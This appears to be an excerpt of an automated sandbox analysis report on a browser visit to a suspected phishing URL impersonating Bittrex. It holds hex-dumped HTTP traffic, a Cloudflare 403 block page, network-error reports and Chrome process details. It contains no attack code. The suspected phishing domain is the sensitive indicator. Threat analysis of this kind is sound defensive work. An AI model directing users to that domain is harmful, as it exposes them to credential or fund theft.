                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3KY6KE1%2BY0Knvx9Hl7WA9o0TtCt%2FG55EMz8oLXK%2Ff7B8fi0riI1WQJtRvZYdkfYhDNJns4kOGrsX0hLv2K%2FNjdCntY0%2BgRbEW3lIDKDAg7M6OTVyesoC544vnmsZ94yfZuSCVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b8678fda913882-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:32 UTC684INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20
                          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE
                          2024-03-28 14:45:32 UTC1369INData Raw: 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69
                          Data Ascii: href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cooki
                          2024-03-28 14:45:32 UTC1369INData Raw: 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c 66 20 66 72 6f 6d
                          Data Ascii: ass="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from
                          2024-03-28 14:45:32 UTC1098INData Raw: 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 0a 20 20 20 20 20 20 59 6f 75 72 20 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
                          Data Ascii: sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">102.165.48.43</span> <span class="cf-footer-separator sm:hi


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.44976535.190.80.14436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:46:31 UTC548OUTOPTIONS /report/v4?s=3KY6KE1%2BY0Knvx9Hl7WA9o0TtCt%2FG55EMz8oLXK%2Ff7B8fi0riI1WQJtRvZYdkfYhDNJns4kOGrsX0hLv2K%2FNjdCntY0%2BgRbEW3lIDKDAg7M6OTVyesoC544vnmsZ94yfZuSCVg%3D%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Origin: https://zhu-ni-hao-yun.sh
                          Access-Control-Request-Method: POST
                          Access-Control-Request-Headers: content-type
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:46:31 UTC336INHTTP/1.1 200 OK
                          Content-Length: 0
                          access-control-max-age: 86400
                          access-control-allow-methods: POST, OPTIONS
                          access-control-allow-origin: *
                          access-control-allow-headers: content-length, content-type
                          date: Thu, 28 Mar 2024 14:46:31 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.44976635.190.80.14436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:46:32 UTC488OUTPOST /report/v4?s=3KY6KE1%2BY0Knvx9Hl7WA9o0TtCt%2FG55EMz8oLXK%2Ff7B8fi0riI1WQJtRvZYdkfYhDNJns4kOGrsX0hLv2K%2FNjdCntY0%2BgRbEW3lIDKDAg7M6OTVyesoC544vnmsZ94yfZuSCVg%3D%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 407
                          Content-Type: application/reports+json
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:46:32 UTC407OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 38 36 30 38 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 36 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 33 2e 35 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 7a 68 75 2d 6e 69 2d 68 61 6f 2d 79
                          Data Ascii: [{"age":58608,"body":{"elapsed_time":766,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.213.53","status_code":403,"type":"http.error"},"type":"network-error","url":"https://zhu-ni-hao-y
                          2024-03-28 14:46:32 UTC168INHTTP/1.1 200 OK
                          Content-Length: 0
                          date: Thu, 28 Mar 2024 14:46:32 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Click to jump to process

                          Click to jump to process

                          Click to jump to process

                          Target ID:0
                          Start time:15:45:18
                          Start date:28/03/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:2
                          Start time:15:45:20
                          Start date:28/03/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2188,i,8863006628045067295,9348882958572428432,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:3
                          Start time:15:45:23
                          Start date:28/03/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://credit-bittrex.com/creditor"
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          No disassembly